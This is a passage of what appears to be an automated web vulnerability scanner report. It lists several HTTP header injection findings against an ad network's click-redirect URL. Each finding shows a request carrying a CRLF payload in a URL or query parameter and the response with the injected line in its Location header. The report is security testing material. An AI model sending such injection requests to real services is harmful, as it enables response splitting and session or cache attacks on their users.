User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aQnEV8o0PaEAZb2t7YSZahO44KovZdgmYfHXbxCDgsmvMJ68oZbjfJ1krEZdSBskxbAWGA5Ht2AHZaEsZa3uPofqc9NFJ0vyanV2TZa3qHqfR8g4y17kxyVQoledCtWEHpSf5ZdrN4lp3usDNtFCS2k71JAsZaSJnZdyZdMoTeZawr4xfivUMZbDHqwJCETlTZdHwLvEX3ZbAZcQGLCCkZaoQWvtKekvlLYmnE1qJ3hlRtjgatvLr8eK6x13P1ugS1CqWEXTgqwsL1sYjWd7VxC35kWhib8ueemJ8LswTK6ZdVc8k6cwnBpnF9GyVxxdaZaqgVaNEnELFcZa66uZcRCkj0RIsmAi6Bn4ruZbwZdrDNhFTZaZctcZcBhC7nPv202622X8JWUvCbfP2PyjVpqxhSZcEFKqJ8caMYMZdiEL4kr0TSElTR5FZcJXxkiDLi18qIriwjdMExYaZcwtGX5rpcZbXZbM8fYcZcjppimmGRrQHAK4JarKKEZaxST78ZdanPFywLNYUi4Qgk9tZbeaUig8qglymMEGs3UHP6OVwskArrL8uZdGngZbJewV1UNyZc1ZdLh9Zc1xBDm8nuUB07xl1GADwVZaeIZd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:50 GMT;
Content-Type: text/html
Location: http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6;sz=8d999
5c8d14598ac
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 74b48%0d%0a8df12efedf8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/74b48%0d%0a8df12efedf8/t.mookie1.com/t/v1/clk HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aInEV8qkaBJDBcN6JQjv1USjRZaHKuixlyvRpCtyVWFIUqZbEO0pm313tUKKUdAYcC5n583s2bMLsIrWlZb3IG8XZcYUdEJGZbZckvxhFAHcZaX0ZaHYNZbc1cjsyZaWylce2R6pe8sItjcn18wS2gZc0o74NAZdEonHTFBADgQ6Za8svjBfqJnbZcZcSDZd4Zb1HjTt5QkaKCBgZc2WOpPZbbZcCnpm5uyIZa3lW4f0cjVTeMmRbCZa4DDuqRCqJZae2DK0tZdx6TGqR1ErwB5GUf10sxCCJnKOQQ6P4tnnWacZdpZa1xT1juTwvy4QLYiUgnGEvlLI2VWw9jPFE2oLusefLFucZbx1UmTZatC1DjdXwDAsAQYKkr7ybxjK9YmTBZbXyc6sNc0rSWBkY6vuQHsv0y4kcp5OZa6lSdOlZcowHSi86LqiMbJ38kpp3s9wZdEIZboX22i6en6rRRiJXBCiP3HFpjCbQMeZd0BIfPkl8QZa7s0SNbrpoNuDrEYmGYrjVpNpWXao8GYUWnwCjrAtVlHsagHdgRdZabuvOlrhxMR8GcZdFr8ZdC4fgxLZd8Ac584UPZdxnkc1Mna2dqhSUyBlwioC; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:33 GMT;
Content-Type: text/html
Location: 74b48
8df12efedf8/t.mookie1.com/t/v1/clk
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 80bfa%0d%0aa4f0fdf3135 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/80bfa%0d%0aa4f0fdf3135/t/v1/clk HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a8nEV8w5EABCYAtRiklfg7TOopGhTqm4CZa4Zc21mlhUFZbZbyyM5rZb9w6BahAZbXJtsRe1bdiubNUGD4T3uI7H8x2q1hj5na3MJ2T4Of45FwZaCZc2c2TDRKdCKZb5bxBXhcZasiKWMOZa4DciFOclnwXIvpvgZdmLaDpsImavFfuFhJUVuPc3RnitHjjCFtOuj2s87G2Zc6XdtOA1CfZdq3kLf0e7rPayNPYeybb96qnZdH6aEkWsXn1YmPXxO3DXedARDbjZaaTsf50ucGF6ImedNae1FqBILF2O7FM3cSAdP1vhL8TrDmK6s4mkwWVm3g8P9Nmb4EEC3NB8GMTj8riRpVw3PCI11CEsUi47OAboaTBNZdmWaYZbqM3TZdshT9Zabx4CtjWI7u2uftkrHGq1rRPQEydRRA50dAyFaDljYJDsHyn7NS9g6ZcPyy7l0v1m4T9vpb5pQpKkZav8pqhes66h9sGZb8GvjPhavrUTRAeJGoKHP4GSZcXSlDiqnN8YyI56ZdkDWa5fLahDi11Zay813vuuJiZbYPZa3ntG5kxUTWoxN7ujehh9Ht8BYiTeY3hf9gGt7ptNmb2w; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:34 GMT;
Content-Type: text/html
Location: http:/80bfa
a4f0fdf3135/t/v1/clk
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload fd929%0d%0a0f9f3457d9f was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/fd929%0d%0a0f9f3457d9f/v1/clk HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aTnEN7Nj6QCAB92QE78i8r424KEwT4gHigNqxwnFwhBHjcrDfQCeqK4wPXLNJgsHApYECZbL33BIZay9xwnCZb2QZbog6erFQeByaEx5kfGJj6H4oh09KgfWowWrg71e8xo4snmOXobmhe8nuheKxZcDCfoscceZbNSnZaZbFfbgxTTmZb9LxCWBGDZca6Fxrd9Axt3gu2EBgZdmiPOUxJJg4uY35Zbb1NCZbdnSwMtprH6Bd94phZchQS3vIyipXagFwtrNpqVrORWd3FgC65M4WqaFCRZamaicLDJZcZdRZacfdmNDxAxid8DQAB4gplHMjRnHjnO5kad6VWNJYfWwUjgPam183jP9xyVxjtX00ZapUbRTZcEInZbIEwAMKNeXamdolwZaNXncZdwXhJUZclDVCewxj7ud6NThRm7dvBeW2RQxACsKZcHZbegZbrPI8bqD91B3pBE5yT8FrmAkb49xZd3cyYq3m27g7cwN6cfQhSBjkPAuZatleZd0jJxq28UspA6ZaibZcXJMLb040MhT7tB5BZbovA12vjB21wYH5swWd4OH0bwE9hXBRVLBwQqXBEtftZbOhZc77dsPhAy; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:00 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/fd929
0f9f3457d9f/v1/clk
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload f749e%0d%0aadf104c6dd3 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/f749e%0d%0aadf104c6dd3/clk HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aqnEV8mMZaCZdBbyppueZbhWSY41SZaxuyqifZc0eZaUoy3QiiYimF4QtuLv5VcLSUXOhotZaPAZbCsqXZbquJa92YdZdBEMtEWjfHFukIhNZdSl08yR5GL8OZbf0ZbNOykQXOWoTuZdxPNFolCK5pZdxYiZcjoACaF2eqNa63ZaG1ZdmmPjwKb6kGjKfvVOFh4lVW7yNMJuhZbWD8NqZapbiR7ZaCZbMWoCSO3H6W8wYHjF0Yr3qa72SpFSN9eDI527JJxjK5I5FGcfATGTQrXS219xGQ7oZaMrLjDlZcQ918iiwSW0TL8xA3W97f7Zc208Bo6mZaWg1pHRLkMwCkgjrGATEdeRlgNSoamDZcKHCkxcmkdmuvLcD7ZbrkwYKY4mJ4YkwR3Za0wMPduDkvGVW5KwemS6EWax3TtV7OXZcSc3VOZccEWXbeZdFHZd9lRwPokDwfJThEAcZanCuC4EAwYq9WIFZbDFYfHBtLXBqdtDUZbc3xv0ljcTSdmJLX8XQVTFfMvl16YtG5Za0qZbq4gcs9xahcKnaqgPUcYbywWip75d5nt5lWvaFnWs7KL5jDpeZaJeebeB7khJUtdlQDsFXNZctaTO; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:18 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/f749e
adf104c6dd3/clk
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 1dd10%0d%0ab9b49b742a6 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/1dd10%0d%0ab9b49b742a6 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=annEV8oZdUWKP7Zdw6MZa9JDWnZbH5IerP2FD3YZd92WfXaOZbpZdPRfFnHiYBNT4AZcyRtqXiBqZaQBZcrXklIHrgaHaO6ZcrK3OtGUr6kiAy0oH7fIE9JKBpACNCFCPPUS3Tw1ZavLZcaWMq8ZbA6iwshouLyIR3Oh1ZcitrSEqlkfCoX2BQ2M8dSGMerZajmeLAKLJyXlMp0s4NjLa4YvjdZdX4PS0jBntNPLfWK1ZanJdWQoomuv7ZbSRUxeR3Yk22B757NUgEgorgpw4YM4q5x0XatCldZbGnMwQWydPvBadtelVPHDvjkNm62xwFZbVGj7wmdKgnyAA3gM9GchY8Y6orCZbpBYox31uqgvEstWIWiiju4cfhYuBLTS0OSqoFnSZdLPx2l1313313ZdFE4OuMLnnyUtO2OHask1Vrk89WpABYgC2DWb8sww1F21Q5v9nGV4hoJG5jK52vptwD5KVRV6hMi2gSgiFWxKk04xxOwLXWqhlQ4sLOWGKKJqA2lPYi48tYFFyg7laD65G8Ln99UJflCMrG3NZaStcsX2d7xyu5FTO2SgmHFdrUWF1TFrjWT8GrUFOfMAl; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:34 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/1dd10
b9b49b742a6
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the adID request parameter is copied into the Location response header. The payload 86472%0d%0a3ac15fbfbe3 was submitted in the adID parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=86472%0d%0a3ac15fbfbe3&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=annEN7oZdUWKP7Zdw6MZa9JDWnZbH5IerP2Zasu5XkwAVQIo9aUL3lroP7fBobi8ZcuRtqXy2awkuPZdZdwBXEQqXBkNL9GHyZcxxvhoTqaiSvZao9VVCIlFBKYNJGn5QyX9bgWfogtDu1aJCeRFagWWZdD4NaJOZbbsKB9HZb7Za4LZcfBM7aZa2EC7om6uiXJoUf36QcjnuhajgsZbXWKqZcCbZb3Guf7f2uGfyGRnDRExTWjETFbHyU27Sf6bnU72qngkr6SsMBZdko4OVeO9yH8DZbHfIxXqWKp2FD1AYO3ae6dZdkiRyQdkZbrZatAFgx3g1ZdWZdVENZbkXjYbykG2JkN6HRxYThoV6aQZdVkX4mi9I1prj1Bb2y7D7M82Zc7sa5ynHypYMIcvXIwAep4Dmr0gZaQ5OAqirQZcnPUsbrTf3KWkxiWKoWS1INH6QIg9VZb9mGmQ3CYXQZcU9q4nU06xd8n1m0hM1IAdxUeYMXuF9oMKI3HMnJb78iNpplmZcmMbD41nCc01bi8FUOwHfmE8K1Zb6nZdixP1XHTFHDlCap1kywrxapM0IaqpcmoWZcZaQINMksxoIyhcHjktAx; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:29 GMT;
Content-Type: text/html
Location: http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=86472
3ac15fbfbe3&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

Issue detail

The value of the cs:a:e request parameter is copied into the Location response header. The payload 32241%0d%0ab96b6c5512a was submitted in the cs:a:e parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk?migAgencyId=14&migSource=adsrv2&migTrackDataExt=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=32241%0d%0ab96b6c5512a HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
